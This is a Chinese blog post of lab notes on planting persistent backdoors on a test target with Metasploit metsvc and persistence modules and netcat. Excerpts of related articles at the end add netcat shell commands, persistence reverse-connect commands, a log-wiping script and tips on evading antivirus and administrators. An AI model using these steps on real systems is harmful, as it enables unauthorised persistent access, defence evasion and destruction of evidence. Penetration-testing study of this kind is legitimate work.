test信息收集12(永久后门植入)

最新推荐文章于 2024-08-27 15:17:48 发布
最新推荐文章于 2024-08-27 15:17:48 发布
阅读量332 收藏 4
点赞数 1
分类专栏: 笔记 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/112163743
版权

在这里插入图片描述
在这里插入图片描述

metsvc是直连

在这里插入图片描述
使用-A这个参数,自动的植入后门,但是有个坏处就是,别人也可以利用你这个端口进行连接。
注意:先要把防火墙和UAC关闭和windefend
在这里插入图片描述

在这里插入图片描述
在靶机上生成的后门
在这里插入图片描述
在这里插入图片描述

persistence是回连,所以要设置一个监听

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

成功生成
在这里插入图片描述

之前我们说了是20秒反连一次,那我们把他kill,然后等20后是不是会回连

在这里插入图片描述

等了20秒后,又反连生成一个session

在这里插入图片描述

我们把靶机重启后,session就全部失效了,这个时候会不会反连呢?

在这里插入图片描述
靶机重启20秒后,又成功反连了
在这里插入图片描述

还可以获得system权限
在这里插入图片描述

最后总结一下,还是推荐使用第二个,因为第一个他是很多东西都是写死了的,不能更改。而第二个可以更改,而且是定期回连

在这里插入图片描述
在这里插入图片描述
各一个system的session
在这里插入图片描述
把nc传到靶机
在这里插入图片描述
在这里插入图片描述
看一下版本
在这里插入图片描述
运行nc
在这里插入图片描述
看一下他的键值名称
在这里插入图片描述
执行cmd关闭防火墙
在这里插入图片描述
可以看到当前是禁用
在这里插入图片描述
最好不要关闭防火墙,因为会被管理员发现,所以最好是给防火墙添加一个过滤规则
在这里插入图片描述
执行完了后,重启靶机
在这里插入图片描述
然后可以看到靶机
在这里插入图片描述
然后用nc去连接靶机的ip
在这里插入图片描述

最后来个大总结,msf因为是在内存里的,重启后就失效了。而利用这种文件后门就是持久性的。

樱浅沐冰
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4370
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
利用Tomcat的用户名和密码构建“永久后门
weixin_33877885的博客
01-11 142
利用Tomcat的用户名和密码构建“永久后门 Simeon 从本案例中可以学到: (1)关于JSP的一些基础知识 (2)利用Tomcat的用户名和密码来构建后门 本文首先要感谢《***手册》“非安全.后生”编辑为本为提供了帮助,还要感谢网友“伤心的鱼”,本文借鉴了“看小菜如何搞定tomcat”一文中的思路,该文中提供的war生成比较模糊,且操作复杂,本文提供的方法简单易行。 JSP是...
metasploit永久后门
热门推荐
星落的博客
05-26 1万+
metasploit永久后门简介 利用漏洞获取的meterpreter shell 运行于内存中,重启失效。 重复利用exploit 漏洞可能造成程序崩溃 持续永久后门保证漏洞修复后仍可以远程控制 metsvc永久后门 1.生成metsvc后门 run metsvc -A 2.启用侦听模块,设置指定metsvc_bind_tcp payload(metsvc默认侦听端口31337) use exploit/multi/handler set payload windows/m...
第十三期_维护访问权限《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 402
十三、维护访问权限 1. 透视以保持访问权限 成功损害主机后,如果接洽规则允许,通常最好确保能够保持访问权限,以便进一步检查或渗透目标网络。这也确保了如果您使用的是一次性漏洞利用或使目标上的服务崩溃,您将能够重新连接到受害者。在这种情况下,在预先重新启动目标之前,您可能无法再次重新获得访问权限。 获得对一个系统的访问权限后,您最终可以访问共享同一子网的系统。从一个系统切换到另一个系统,通过监视用户的击键来获取有关用户活动的信息,以及使用捕获的令牌模拟用户,这些只是我们将在本模块中进一步描述的一些技术。 2.
永恒之蓝配合nc植入后门【笔记】
星落
12-15 525
永恒之蓝与nc的配合植入后门并反弹shell
Linux后门之道——NC用法别有洞天
苏安的博客
03-06 2396
对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是:nc -l -vv -p 2222 -e /bin/bash在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个GAPING_...
利用nc构建telnet后门控制案例
kf的专栏
02-03 793
nc俗称为网络中的“瑞士军刀”其功能强大,如果在肉鸡上运行“nc.exe –p port –L –d –e cmd.exe”命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存在。本案例通过一个bat文件来构建一个telnet后门,当系统重新启动后,该后门会继续存在。当然nc还有许多其它用法:   (1)连接到REMOTE主机,格式:nc -nvv 192.
黑客实战之攻击篇——用NC打造成自己的简单后门
cexosoft的专栏
01-30 9167
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。   首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc
MSF之Persistence后门
weixin_46104215的博客
09-27 2765
Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
利用nc构建Telnet后门控制案例
weixin_33755649的博客
06-25 160
4.1.6 利用nc构建Telnet后门控制案例 通过本案例你可以学习到: ① 通过nc来构建Telnet后门; ② 利用bat文件来启动nc后门。 nc俗称为网络中的"瑞士×××"其功能强大,如果在肉鸡上运行"nc.exe -p port -L -d -e cmd.exe"命令就可以构建一个telnet后门,即使关闭了nc.exe程序运行窗口,该后门程序还继续存...
史上 12 大著名安全后门植入案例
u013908200的专栏
07-11 2993
“棱镜门”事件后, 人们关于软件植入后门的日益关注, 其实, 植入后门这种手法黑客很早就在使用了。 最近, InfoWorld为大家总结了史上最著名的12后门植入案例: Back Orifice Back Orifice是史上第一个后门。 也是它使得人们开始意识到后门存在的可能性。 Back Orifice可以让运行Windows的计算机能够被远程操控。 Back Orifice用了一个
利用NC打造成自己的简单后门
司刚军的个人专栏
12-19 4169
大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。 首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc.
Linux日志清理脚本
apple_54886810的博客
08-28 160
cat clog.sh #!/usr/bin/bash echo > /var/log/syslog echo > /var/log/messages echo > /var/log/httpd/access_log echo > /var/log/httpd/error_log echo > /var/log/xferlog echo > /var/log/secure echo > /var/log/auth.log echo > /var/log/use
通过meterpreter留nc后门
Yale的博客
01-27 1970
在靶机上安装一个netcat后门(包括修改系统注册表及防火墙) 首先我们需要上传我们的nc到靶机上 Uploaded表示上传成功(注:由于靶机是64位,所以自动上传到了syswow64路径下)   接下来我们需要修改注册表的键“HKLM\software\microsoft\windows\currentversion\run” 让nc在启动后执行并且在445端口监听  
nc——制作后门连接与反弹shell连接的使用
1stPeak's Blog
04-18 3701
一、nc参数 -g<网关> 设置路由器跃程通信网关,最多可设置8个 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口 -l 使用监听模式,管控传入的资料 -n 直接使用IP地址,而不通过域名服务器。 -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒...
Kali 中 Persistence后门的使用
大方子
09-02 3507
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
nc后门
zgwz123456的博客
03-21 1608
实验环境 靶 机:windows 7 攻击机:kali 漏洞利用:ms17-010 msfconsole use exploit/windows/smb/ms17_010_eternalbule set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.21.134 set lhost 192.168.21.130 set lport 6666 run 拿到权限后上传我们的nc后门程序(我把它改名成了qq) 查看启动项的键值项,
Linux基础知识(一、什么是Linux
心寒的博客
08-26 1656
什么是Linux Linux创始人
Linux中的常见命令——用户管理命令
最新发布
qq_45569925的博客
08-27 1075
默认创建用户的时候会在home文件夹下创建一个与用户同名的文件夹【该用户的主目录】,也可以在创建用户的时候设置该用户主目录的名称。【输入的密码是不在控制台显示的,输入完之后直接按回车键即可】使用wgh用户查看root下的文件。【此时的用户是没有密码的】给创建的用户设置密码。查看某个用户是否存在。
创建一个名为test永久性表空间
06-01
好的,您可以使用以下SQL语句在Oracle数据库中创建一个名为test永久性表空间: ``` CREATE TABLESPACE test DATAFILE 'test.dbf' SIZE 100M AUTOEXTEND ON; ``` 这将创建一个名为test永久性表空间,大小为100M...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值